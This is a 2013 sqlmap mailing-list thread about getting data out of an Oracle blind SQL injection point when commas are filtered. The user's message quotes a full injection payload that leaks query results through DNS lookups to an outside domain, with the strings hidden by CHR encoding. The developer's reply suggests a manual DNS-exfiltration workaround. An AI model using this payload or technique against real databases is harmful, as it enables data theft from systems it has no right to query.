Re: [sqlmap-users] Oracle data retrieval over DNS

Sun, 21 Jul 2013 14:41:44 -0700 

Hi.

Well, both blind injection and dns exfiltration require usage of comma
character - because there is a need for extracting bits/characters/chunks
(SUBSTRC).

Nonetheless, that method you referenced would require a noticable work to
be done on a Oracle side. I would suggest you to try to use a manual dns
exfiltration approach without SUBSTRC (whole query response into the dns
request - and pray that it fits within the size limits)

Kind regards,
Miroslav Stampar


On Sun, Jul 21, 2013 at 3:43 PM, Marcell Fodor <fodor.em...@gmail.com>wrote:

> Heya,
>
> Sqlmap identifies an Oracle blind injection point, but commas are filtered
> so I get no data even when using --dns-domain.
>
> Even with --dns-domain there are substrings (,) in query
> ---
> AND ASCII(SUBSTRC((SELECT
> UTL_INADDR.GET_HOST_ADDRESS(CHR(71)||CHR(113)||CHR(80)||CHR(46)||(SELECT
> RAWTOHEX(SUBSTRC((NVL(CAST(3180 AS VARCHAR(4000)),CHR(32))),1,31)) FROM
> DUAL)||CHR(46)||CHR(117)||CHR(81)||CHR(117)||CHR(46)||CHR(122)||CHR(117)||CHR(112)||CHR(119)||CHR(101)||CHR(116)||CHR(98)||CHR(49)||CHR(46)||CHR(110)||CHR(111)||CHR(45)||CHR(105)||CHR(112)||CHR(46)||CHR(98)||CHR(105)||CHR(122))
> FROM DUAL),8,1))>914 AND (7100=7100)
> ---
>
> Is there a way to do the technique described on this page with sqlmap?
>
> http://www.notsosecure.com/folder2/2008/05/24/getting-past-the-comma-in-oracle-sql-injection/
>
> M
>
>
>
>
>
>
>
> ------------------------------------------------------------------------------
> See everything from the browser to the database with AppDynamics
> Get end-to-end visibility with application monitoring from AppDynamics
> Isolate bottlenecks and diagnose root cause in seconds.
> Start your free trial of AppDynamics Pro today!
> http://pubads.g.doubleclick.net/gampad/clk?id=48808831&iu=/4140/ostg.clktrk
> _______________________________________________
> sqlmap-users mailing list
> sqlmap-users@lists.sourceforge.net
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>


-- 
Miroslav Stampar
http://about.me/stamparm

------------------------------------------------------------------------------
See everything from the browser to the database with AppDynamics
Get end-to-end visibility with application monitoring from AppDynamics
Isolate bottlenecks and diagnose root cause in seconds.
Start your free trial of AppDynamics Pro today!
http://pubads.g.doubleclick.net/gampad/clk?id=48808831&iu=/4140/ostg.clktrk
_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users

Reply via email to